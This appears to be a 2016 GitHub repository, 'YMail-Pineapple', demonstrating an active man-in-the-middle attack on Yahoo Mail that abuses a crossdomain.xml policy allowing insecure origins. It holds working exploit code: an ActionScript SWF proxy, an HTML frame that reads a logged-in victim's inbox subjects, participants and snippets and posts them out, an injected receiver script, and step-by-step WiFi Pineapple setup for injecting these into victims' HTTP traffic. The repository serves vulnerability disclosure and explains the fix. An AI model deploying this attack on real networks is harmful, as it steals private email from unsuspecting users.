├── MailGrabber.swf
├── screenshot.png
├── receiver.js
├── LICENSE
├── grabberFrame.html
├── MailGrabber.as
└── README.md


/MailGrabber.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JordanMilne/YMail-Pineapple/HEAD/MailGrabber.swf


--------------------------------------------------------------------------------
/screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JordanMilne/YMail-Pineapple/HEAD/screenshot.png


--------------------------------------------------------------------------------
/receiver.js:
--------------------------------------------------------------------------------
1 | document.write('<pre id="mail_col" style="display: block; opacity: 1; background-color: #ddd; color: #000; margin: 10%; padding: 1%; left: 0px; top: 0px; white-space: pre-wrap; position: absolute;  z-index: 9999999999"></pre>');
2 | 
3 | window.addEventListener('message', function(msg) {
4 |     // shit it into the DOM
5 |     document.getElementById("mail_col").textContent = msg.data;
6 | });
7 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2016 Jordan Milne
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/grabberFrame.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | var FETCH_MAIL_URL = "http" + "s://mg.mail.yahoo.com/neo/launch";
 3 | var BOOTSTRAP_REGEX = /[\s\S]+<script>(\(function\(NC\)\{NC\.ulPadding=.*?)<\/script>[\s\S]+/m;
 4 | 
 5 | var NeoConfig = {};
 6 | 
 7 | // This will be called by `MailGrabber.swf` after it loads
 8 | function flasherReady() {
 9 |     flashProxy(FETCH_MAIL_URL, "", "onMailLeaked");
10 | }
11 | 
12 | function flashProxy(url, data, callback_name) {
13 |     document.getElementById('flasher').send(url, data, callback_name);
14 | }
15 | 
16 | function onMailLeaked(status, data) {
17 |     // Pull the JS bootstrap data out of the mail listing
18 |     // and eval it... don't do this at home, kids.
19 |     var pageData = deflashify(data);
20 |     var prettyMsgs = "";
21 |     if (pageData) {
22 |         var jsData = pageData.replace(BOOTSTRAP_REGEX, '$1');
23 |         // This will shove a bunch of data into `NeoConfig`
24 |         try {
25 |             eval(jsData);
26 |         } catch(e) {}
27 |         
28 |         // pick out the attrs we want
29 |         var msgs = NeoConfig.msgListObj.map(function(val){
30 |             return {
31 |                 "subject": val.subject,
32 |                 "participantList": val.participantList,
33 |                 "snippetStr": val.snippetStr,
34 |             };
35 |         });
36 |         prettyMsgs = JSON.stringify(msgs, null, 2);
37 |     } else {
38 |         prettyMsgs = "Couldn't fetch inbox. Are you logged in on YMail?";
39 |     }
40 |     window.parent.postMessage(prettyMsgs, "*");
41 | }
42 | 
43 | function deflashify(flashed) {
44 |     return JSON.parse(decodeURIComponent(flashed));
45 | }
46 | 
47 | </script>
48 | <object id="flasher" width="1" height="1" data="//spoof.yahoo.com/MailGrabber.swf"><param name="AllowScriptAccess" value="always"></object>
49 | 


--------------------------------------------------------------------------------
/MailGrabber.as:
--------------------------------------------------------------------------------
 1 | package {
 2 | 
 3 | import flash.display.*;
 4 | import flash.events.*;
 5 | import flash.external.*;
 6 | import flash.net.*;
 7 | import flash.text.*;
 8 | import flash.utils.*;
 9 | import flash.system.*;
10 | 
11 | public class MailGrabber extends MovieClip {
12 | 
13 |     public function MailGrabber() {
14 |         addEventListener(Event.ADDED_TO_STAGE, onAdded);
15 |     }
16 | 
17 |     private function onAdded(e:Event):void {
18 |         setTimeout(function():void {
19 |             if (ExternalInterface.available) {
20 |                 ExternalInterface.addCallback("send", send);
21 |                 ExternalInterface.call("flasherReady");
22 |             }
23 |         }, 1);
24 |     }
25 | 
26 |     public function send(url:String, data:String, callback:String):void {
27 |         var request:URLRequest = new URLRequest(url);
28 |         if (data) {
29 |             request.data = data;
30 |             request.method = 'POST';
31 |         }
32 |         var loader:URLLoader = new URLLoader();
33 |         var handler:Function = function handler(e:Event):void {
34 |             loader.removeEventListener(Event.COMPLETE, handler);
35 |             loader.removeEventListener(IOErrorEvent.IO_ERROR, handler);
36 |             loader.removeEventListener(SecurityErrorEvent.SECURITY_ERROR, handler);
37 |             if ( e.type != IOErrorEvent.IO_ERROR && e.type != SecurityErrorEvent.SECURITY_ERROR ) {
38 |                 ExternalInterface.call(callback, 200, encodeData(loader.data)); // fix status
39 |             } else {
40 |                 ExternalInterface.call(callback, 0, encodeData(loader.data)); // error TODO
41 |             }
42 |         }
43 |         
44 |         loader.addEventListener(Event.COMPLETE, handler);
45 |         loader.addEventListener(IOErrorEvent.IO_ERROR, handler);
46 |         loader.addEventListener(SecurityErrorEvent.SECURITY_ERROR, handler);
47 |         loader.load(request);
48 |     }
49 |     
50 |     private function encodeData(obj:Object):String {
51 |         return encodeURIComponent(JSON.stringify(obj));
52 |     }
53 | }
54 | }
55 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ## YMail-Pineapple
 2 | 
 3 | A couple years back [I mentioned](http://blog.saynotolinux.com/blog/2014/03/01/yahoos-pet-show-of-horrors-abusing-a-crossdomain-proxy-to-leak-a-users-email/) that Yahoo! Mail is vulnerable to active MITM attacks due to problems with its `crossdomain.xml` policy. Specifically, Yahoo Mail policy is
 4 | 
 5 | ```xml
 6 | <cross-domain-policy>
 7 |     <allow-access-from domain="*.yahoo.com" secure="false"/>
 8 | </cross-domain-policy>
 9 | ```
10 | 
11 | [Per Adobe](https://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for-streaming.html#articlecontentAdobe_numberedheader_0) "using \[secure=\]false in an HTTPS policy file is not recommended because this compromises the security offered by HTTPS."
12 | 
13 | Note that the ability to give insecure documents privileged access to secure resources isn't unique to Flash's crossdomain policies. [You can make the same mistake with CORS headers (see "Breaking HTTPS".)](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)
14 | 
15 | Anywho, since Yahoo still hasn't fixed this I figured I'd demonstrate that this isn't just a handwavey warning, and that this makes Yahoo Mail trivially MITMable.
16 | 
17 | Putting aside aside my concerns about the security of its code, I own a Wifi Pineapple Mark V so the instructions assume you're using one as well. All of this could be reasonably adapted to any other router that can run vanilla OpenWRT.
18 | 
19 | ## How does it work?
20 | 
21 | First, we intercept every plaintext HTTP response and inject an `<iframe>` pointing to `http://spoof.yahoo.com/grabberFrame.html` onto every page. Our device intercepts that request responds with [our own document](grabberFrame.html) that embeds `http://spoof.yahoo.com/MailGrabber.swf`. The request for that `swf` is similarly intercepted and replaced with [our own SWF](MailGrabber.as).
22 | 
23 | We should now have a document on `spoof.yahoo.com` embedding our own `swf` loaded in the user's browser. The document [asks the `swf` to request the user's YMail page](grabberFrame.html#L7-L14) via Flash's JS<->SWF bridge and the SWF [sends the page's content back to our JS](MailGrabber.as#L26-L48). At this point the content can be leaked to a remote server or something similar, but out demo dumps it onto the page.
24 | 
25 | This is possible because even though `*.mail.yahoo.com` has an HSTS policy, uses the `Secure` flag on the relevant cookies, and always redirects to `https`, the `crossdomain.xml` policy gives our SWF served over HTTP privileged access to YMail pages served over HTTPS.
26 | 
27 | ## Configuring
28 | 
29 | * Make sure your Pineapple is connected to the internet via ethernet or a second wifi radio
30 | * Install the [strip-n-inject infusion](https://forums.hak5.org/index.php?/topic/30673-support-strip-n-inject/)
31 | ** I needed to run `mkdir -p /sd/tmp/` to get `strip-n-inject` to start but YMMV
32 | * SSH into your Pineapple and add `127.0.0.1 spoof.yahoo.com` to `/etc/hosts` so it will read from our internal webserver
33 | * `rsync` the contents of this repo to `/www/` on your Pineapple
34 | * Configure `strip-n-inject` to inject the following onto each page:
35 | 
36 | ```html
37 | <script src="http://spoof.yahoo.com/receiver.js"></script>
38 | <iframe width="1" height="1" src="http://spoof.yahoo.com/grabberFrame.html"></iframe>
39 | ```
40 | 
41 | * If you don't want to dump the inbox contents to the current page, edit `grabber.js` to do something other than `postMessage()` and remove the `receiver.js` line from `strip-n-inject`'s config
42 | 
43 | 
44 | ## Running
45 | 
46 | At this point you should be ready to test. Make sure you're logged in on YMail and navigate to http://www.cnn.com/ while connected to the Pineapple's public interface. You should see a box like
47 | 
48 | ![Emails dumped into www.cnn.com](/screenshot.png)
49 | 
50 | If you don't, make sure `strip-n-inject` is configured correctly and check your browser console.
51 | 
52 | ## Fixing
53 | 
54 | This will no longer work once Yahoo removes `secure="false"` from their `crossdomain.xml`s.
55 | 


--------------------------------------------------------------------------------